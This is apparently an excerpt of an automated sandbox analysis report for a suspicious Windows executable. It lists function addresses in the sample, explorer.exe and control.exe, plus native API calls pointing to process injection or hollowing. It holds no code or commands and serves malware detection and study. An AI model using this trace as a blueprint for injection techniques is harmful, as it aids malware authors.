          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3D5700_2_05E3D570
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E381880_2_05E38188
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E381980_2_05E38198
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3D0E80_2_05E3D0E8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3D0D80_2_05E3D0D8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3A0690_2_05E3A069
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3D3690_2_05E3D369
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3D3780_2_05E3D378
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E38D080_2_05E38D08
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3EF200_2_05E3EF20
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3AED10_2_05E3AED1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3CEA10_2_05E3CEA1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3CEB00_2_05E3CEB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3AE2F0_2_05E3AE2F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3E9840_2_05E3E984
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3E9990_2_05E3E999
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3F8690_2_05E3F869
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3C8680_2_05E3C868
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3C8780_2_05E3C878
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3F8780_2_05E3F878
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_076747E00_2_076747E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_076737D80_2_076737D8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_076743680_2_07674368
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_076737C80_2_076737C8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_076747D10_2_076747D1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_076716B80_2_076716B8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_0767168B0_2_0767168B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_0767435A0_2_0767435A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_076732280_2_07673228
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_076732190_2_07673219
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_0767DFA00_2_0767DFA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041ED7A3_2_0041ED7A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041DD023_2_0041DD02
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041E5153_2_0041E515
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041DD903_2_0041DD90
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041D5A63_2_0041D5A6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041DFBB3_2_0041DFBB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FC20003_2_00FC2000
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE81CC3_2_00FE81CC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF01AA3_2_00FF01AA
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB81583_2_00FB8158
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCA1183_2_00FCA118
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F201003_2_00F20100
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FB02C03_2_00FB02C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD02743_2_00FD0274
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3E3F03_2_00F3E3F0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF03E63_2_00FF03E6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEA3523_2_00FEA352
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FDE4F63_2_00FDE4F6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE24463_2_00FE2446
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FF05913_2_00FF0591
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F305353_2_00F30535
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4C6E03_2_00F4C6E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2C7C03_2_00F2C7C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F307703_2_00F30770
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F547503_2_00F54750
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F5E8F03_2_00F5E8F0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F168B83_2_00F168B8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3A8403_2_00F3A840
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F328403_2_00F32840
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F329A03_2_00F329A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FFA9A63_2_00FFA9A6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F469623_2_00F46962
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2EA803_2_00F2EA80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE6BD73_2_00FE6BD7
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEAB403_2_00FEAB40
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F20CF23_2_00F20CF2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD0CB53_2_00FD0CB5
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30C003_2_00F30C00
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F2ADE03_2_00F2ADE0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F48DBF3_2_00F48DBF
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3AD003_2_00F3AD00
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEEEDB3_2_00FEEEDB
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F42E903_2_00F42E90
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FECE933_2_00FECE93
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F30E593_2_00F30E59
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEEE263_2_00FEEE26
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3CFE03_2_00F3CFE0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F22FC83_2_00F22FC8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FAEFA03_2_00FAEFA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA4F403_2_00FA4F40
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F50F303_2_00F50F30
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F72F283_2_00F72F28
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE70E93_2_00FE70E9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEF0E03_2_00FEF0E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FDF0CC3_2_00FDF0CC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F370C03_2_00F370C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F3B1B03_2_00F3B1B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1F1723_2_00F1F172
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FFB16B3_2_00FFB16B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6516C3_2_00F6516C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FD12ED3_2_00FD12ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4B2C03_2_00F4B2C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F352A03_2_00F352A0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F7739A3_2_00F7739A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F1D34C3_2_00F1D34C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE132D3_2_00FE132D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F214603_2_00F21460
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEF43F3_2_00FEF43F
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCD5B03_2_00FCD5B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE75713_2_00FE7571
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE16CC3_2_00FE16CC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEF7B03_2_00FEF7B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F338E03_2_00F338E0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F9D8003_2_00F9D800
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F399503_2_00F39950
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4B9503_2_00F4B950
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FDDAC63_2_00FDDAC6
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FCDAAC3_2_00FCDAAC
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F75AA03_2_00F75AA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA3A6C3_2_00FA3A6C
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFA493_2_00FEFA49
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE7A463_2_00FE7A46
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA5BF03_2_00FA5BF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F6DBF93_2_00F6DBF9
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4FB803_2_00F4FB80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFB763_2_00FEFB76
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFCF23_2_00FEFCF2
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FA9C323_2_00FA9C32
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F4FDC03_2_00F4FDC0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE7D733_2_00FE7D73
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FE1D5A3_2_00FE1D5A
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F33D403_2_00F33D40
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F39EB03_2_00F39EB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFFB13_2_00FEFFB1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F31F923_2_00F31F92
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00FEFF093_2_00FEFF09
          Source: C:\Windows\explorer.exeCode function: 4_2_0E6092324_2_0E609232
          Source: C:\Windows\explorer.exeCode function: 4_2_0E603B304_2_0E603B30
          Source: C:\Windows\explorer.exeCode function: 4_2_0E603B324_2_0E603B32
          Source: C:\Windows\explorer.exeCode function: 4_2_0E6080364_2_0E608036
          Source: C:\Windows\explorer.exeCode function: 4_2_0E5FF0824_2_0E5FF082
          Source: C:\Windows\explorer.exeCode function: 4_2_0E600D024_2_0E600D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0E6069124_2_0E606912
          Source: C:\Windows\explorer.exeCode function: 4_2_0E60C5CD4_2_0E60C5CD
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74D2324_2_0E74D232
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74C0364_2_0E74C036
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7430824_2_0E743082
          Source: C:\Windows\explorer.exeCode function: 4_2_0E747B304_2_0E747B30
          Source: C:\Windows\explorer.exeCode function: 4_2_0E747B324_2_0E747B32
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74A9124_2_0E74A912
          Source: C:\Windows\explorer.exeCode function: 4_2_0E744D024_2_0E744D02
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7505CD4_2_0E7505CD
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E0E4F65_2_04E0E4F6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E124465_2_04E12446
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D514605_2_04D51460
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1F43F5_2_04E1F43F
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DFD5B05_2_04DFD5B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E205915_2_04E20591
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E175715_2_04E17571
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D605355_2_04D60535
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E116CC5_2_04E116CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7C6E05_2_04D7C6E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D5C7C05_2_04D5C7C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1F7B05_2_04E1F7B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D847505_2_04D84750
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D607705_2_04D60770
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1F0E05_2_04E1F0E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E170E95_2_04E170E9
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D670C05_2_04D670C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E0F0CC5_2_04E0F0CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E181CC5_2_04E181CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E201AA5_2_04E201AA
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6B1B05_2_04D6B1B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DE81585_2_04DE8158
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E2B16B5_2_04E2B16B
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D4F1725_2_04D4F172
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D9516C5_2_04D9516C
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DFA1185_2_04DFA118
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D501005_2_04D50100
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E012ED5_2_04E012ED
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7B2C05_2_04D7B2C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D652A05_2_04D652A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E002745_2_04E00274
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E203E65_2_04E203E6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6E3F05_2_04D6E3F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DA739A5_2_04DA739A
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D4D34C5_2_04D4D34C
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1A3525_2_04E1A352
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1132D5_2_04E1132D
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FCF25_2_04E1FCF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D50CF25_2_04D50CF2
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E00CB55_2_04E00CB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D60C005_2_04D60C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DD9C325_2_04DD9C32
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7FDC05_2_04D7FDC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D5ADE05_2_04D5ADE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D78DBF5_2_04D78DBF
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E17D735_2_04E17D73
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D63D405_2_04D63D40
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E11D5A5_2_04E11D5A
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6AD005_2_04D6AD00
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1EEDB5_2_04E1EEDB
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D72E905_2_04D72E90
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D69EB05_2_04D69EB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1CE935_2_04E1CE93
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D60E595_2_04D60E59
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1EE265_2_04E1EE26
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D52FC85_2_04D52FC8
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6CFE05_2_04D6CFE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D61F925_2_04D61F92
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FFB15_2_04E1FFB1
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DD4F405_2_04DD4F40
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FF095_2_04E1FF09
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D80F305_2_04D80F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DA2F285_2_04DA2F28
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D8E8F05_2_04D8E8F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D638E05_2_04D638E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D468B85_2_04D468B8
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D628405_2_04D62840
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D6A8405_2_04D6A840
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DCD8005_2_04DCD800
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E2A9A65_2_04E2A9A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D629A05_2_04D629A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D699505_2_04D69950
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7B9505_2_04D7B950
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D769625_2_04D76962
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E0DAC65_2_04E0DAC6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D5EA805_2_04D5EA80
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DFDAAC5_2_04DFDAAC
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DA5AA05_2_04DA5AA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E17A465_2_04E17A46
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FA495_2_04E1FA49
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DD3A6C5_2_04DD3A6C
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D9DBF95_2_04D9DBF9
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04DD5BF05_2_04DD5BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E16BD75_2_04E16BD7
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D7FB805_2_04D7FB80
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1FB765_2_04E1FB76
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04E1AB405_2_04E1AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8D5A65_2_02A8D5A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8E5155_2_02A8E515
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A79E605_2_02A79E60
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A72FB05_2_02A72FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A72D905_2_02A72D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8DD905_2_02A8DD90
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8DD025_2_02A8DD02
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04DCEA12 appears 86 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04DDF290 appears 105 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04D95130 appears 36 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04DA7E54 appears 96 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04D4B970 appears 268 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00F65130 appears 40 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00FAF290 appears 105 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00F77E54 appears 99 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00F1B970 appears 274 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: String function: 00F9EA12 appears 86 times
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041A3B3 NtCreateFile,NtReadFile,3_2_0041A3B3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041A40D NtReadFile,3_2_0041A40D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041A53B NtAllocateVirtualMemory,3_2_0041A53B
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62AD0 NtReadFile,LdrInitializeThunk,3_2_00F62AD0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00F62BF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62B60 NtClose,LdrInitializeThunk,3_2_00F62B60
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_00F62CA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00F62C70
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_00F62DF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62DD0 NtDelayExecution,LdrInitializeThunk,3_2_00F62DD0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00F62D30
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62D10 NtMapViewOfSection,LdrInitializeThunk,3_2_00F62D10
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00F62EA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_00F62E80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62FE0 NtCreateFile,LdrInitializeThunk,3_2_00F62FE0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62FB0 NtResumeThread,LdrInitializeThunk,3_2_00F62FB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00F62F90
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62F30 NtCreateSection,LdrInitializeThunk,3_2_00F62F30
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F64340 NtSetContextThread,3_2_00F64340
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F64650 NtSuspendThread,3_2_00F64650
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62AF0 NtWriteFile,3_2_00F62AF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62AB0 NtWaitForSingleObject,3_2_00F62AB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62BE0 NtQueryValueKey,3_2_00F62BE0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62BA0 NtEnumerateValueKey,3_2_00F62BA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62B80 NtQueryInformationFile,3_2_00F62B80
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62CF0 NtOpenProcess,3_2_00F62CF0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62CC0 NtQueryVirtualMemory,3_2_00F62CC0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62C60 NtCreateKey,3_2_00F62C60
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62C00 NtQueryInformationProcess,3_2_00F62C00
